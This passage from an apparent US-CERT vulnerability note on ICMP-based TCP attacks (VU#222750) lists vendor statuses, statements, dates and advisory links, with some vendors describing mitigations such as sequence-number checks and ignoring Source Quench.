this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Symantec Corporation __ Affected\n\nNotified: August 12, 2004 Updated: May 03, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [SYM05-008](<http://securityresponse.symantec.com/avcenter/security/Content/2005.05.02.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### WatchGuard __ Affected\n\nNotified: August 12, 2004 Updated: April 11, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAll WatchGuard firewalls are impacted to some extent by Gont's findings. TCP sessions which terminate on or pass through the firewall are vulnerable to reset attacks when the attacker can guess the source and destination address and port combinations for that session. WatchGuard plans to address the issues raised by Gont's paper for all products in software releases currently scheduled for the Q2-Q3 2005 time frame. If you have further questions about this or any other security concern with WatchGuard products, please contact:\n\nSteve Fallin \nDirector, Rapid Response Team \nWatchGuard Technologies \n<http://www.watchguard.com> \nsteve.fallin@watchguard.com \n+1.206.521.8340\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Wind River Systems, Inc. __ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nIn all releases after VxWorks 5.3 a hard error does not result in TCP aborting the connection. The hard error code is saved by TCP. If the connection is dropped due to a timeout this error code is available to the application. Wind River Network Stack 2.0 already checks the ICMP sequence numbers. The release of VxWorks 6.0 and the MSP updates shipping in the fall of 2004 are based on this stack.\n\nWind River is planning updates to the VxWorks 5.5 and 5.4 versions of the stack that will include the fix for ICMP. These updates are planned for 2005.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Check Point __ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCheck Point products are not vulnerable to this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Clavister __ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nClavister Firewall is itself not vulnerable to this class of attacks. It also attempts to protect clients against such attacks.\n\nSpecifically: \n\n\n * No ICMP errors are passed by default. They may however be allowed on a per-rule/service basis.\n * The firewall's own TCP stack (used by internal processes and ALGs) does not listen ICMP errors at all.\n * All sequence numbers are scrambled using a high quality random engine, making sequence number guessing harder.\n * In the case of many-to-one (dynamic) NAT, source port numbers are allocated randomly, making source port number guessing harder. See draft-gont-tcpm-icmp-attacks-00 section 5.3\n * On not accepting ICMP errors: The method outlined in draft-gont-tcpm-icmp-attacks-00 section 5.2 (delaying the connection reset) results in behavior not too dissimilar. The difference simply lies in how many packets that get sent before the connection is failed.\n * PMTU discovery problems that normally arise by not accepting ICMP errors by default are avoided by doing DF bit stripping by default. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Cyber Guard __ Not Affected\n\nUpdated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Enterasys Networks __ Not Affected\n\nUpdated: June 15, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see &lt;<http://www.enterasys.com/support/security/advisories/222750.pdf>&gt;\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Fedora Project __ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCAN-2004-0790: A blind TCP connection reset by sending\n\nThe Linux 2.4 and 2.6 kernels have always verified the TCP sequence number on ICMP errors. In addition Linux kernels will never abort a connection due to a received ICMP packet. All Fedora Core versions are therefore unaffected by this issue. \n \nCAN-2004-0791: A spoofing attack with ICMP type 4 header \n \nThe Linux kernel since 2.6.9 and 2.4.28 has included a patch by Dave Miller to ignore ICMP Source Quench messages as recommended by Fernando Gont. Fedora Core 3 shipped with a 2.6.9 kernel which ignores ICMP Source Quench messages. Fedora Core 2 was updated to a 2.6.9 kernel in a November 2004 update and is therefore also unaffected by this issue. \n \nCAN-2004-1060: ICMP path MTU spoofing \n \nLinux 2.4 and 2.6 kernels verify the sequence number on ICMP errors, thus significantly mitigating this issue. This issue can also be mitigated by disabling pmtu discovery if not required (/proc/sys/net/ipv4/ip_no_pmtu_disc)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Fortinet __ Not Affected\n\nNotified: August 12, 2004 Updated: April 21, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFortinet does not have this problem.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Foundry Networks Inc. __ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFoundry's implementation of ICMP on its products is not vulnerable to this type of attack.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Fujitsu __ Not Affected\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>, <http://software.fujitsu.com/jp/security/niscc/niscc.html#222750-tcpicmp>, and <http://jvn.jp/niscc/532967/index.html> (Japanese).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Intoto __ Not Affected\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe analyzed the potential threats discussed in the IETF draft \n\n \ndraft-gont-tcpm-icmp-attacks-00.txt \nand observed that Intoto products are not vulnerable to the described denial of service (DoS) attacks. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNEC Corporation products are not susceptible to this vulnerability.\n\n * We continue to check our products.\n * For more detail:\n<http://www.sw.nec.co.jp/psirt/index.html> (Japanese) \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Netscreen __ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nJuniper Networks M-series and T-series routers running certain releases of JUNOS software are susceptible to this vulnerability. Other Juniper Networks products are not susceptible to this vulnerability. Customers should visit the Juniper Networks Customer Service Center web-site for further information.\n\n<http://www.juniper.net/customers/csc>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Secure Computing Corporation __ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nSecure Computing has carefully analyzed the scenarios outlined in the Internet Draft, and has determined that the Sidewinder G2 responds appropriately in those situations. Some of the scenarios mentioned in this draft illustrate again the desirability of using carefully configured security appliances and using protocols such as IPsec.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### SecureWorks __ Not Affected\n\nUpdated: May 03, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Stonesoft __ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nStonesoft StoneGate Firewall and IPS products are not affected by these vulnerabilities.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Tech Matrix __ Not Affected\n\nUpdated: April 29, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://jvn.jp/niscc/532967/index.html> (Japanese).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Yamaha __ Not Affected\n\nUpdated: April 29, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://jvn.jp/niscc/532967/index.html> (Japanese).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### 3Com __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### AT&amp;T __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Apple Computer, Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>. Apple Mac OS X versions prior to 10.2 may be affected.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Avaya __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Avici Systems Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Borderware __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Charlotte's Web Networks __ Unknown\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Chiaro Networks __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Computer Associates __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Cray Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Data Connection __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Debian Linux __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Dlink __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### EMC Corporation __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Engarde __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### FreeBSD, Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### GTA __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Hyperchip __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### IP Filter __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Immunix __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Ingrian Networks, Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Intel __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Lachman __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Linksys __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Lucent Technologies __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Luminous __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Mandriva, Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Mandriva, Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### MontaVista Software, Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Multi-Tech Systems Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Multinet __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### NetBSD __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Network Associates __ Unknown\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### NextHop __ Unknown\n\nNotified: August 12, 2004 Updated: April 21, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNextHop Technologies software does not include a TCP/IP stack. Instead, it relies on third party TCP/IP stacks. As a result, NextHop software is not directly affected by this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Nokia __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Novell, Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Openwall GNU/*/Linux __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Polycom Inc. __ Unknown\n\nUpdated: September 08, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en> and the Security Headlines posted at the Polycom [Security Center](<http://www.polycom.com/securitycenter/>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Riverstone Networks __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### SGI __ Unknown\n\nNotified: August 12, 2004 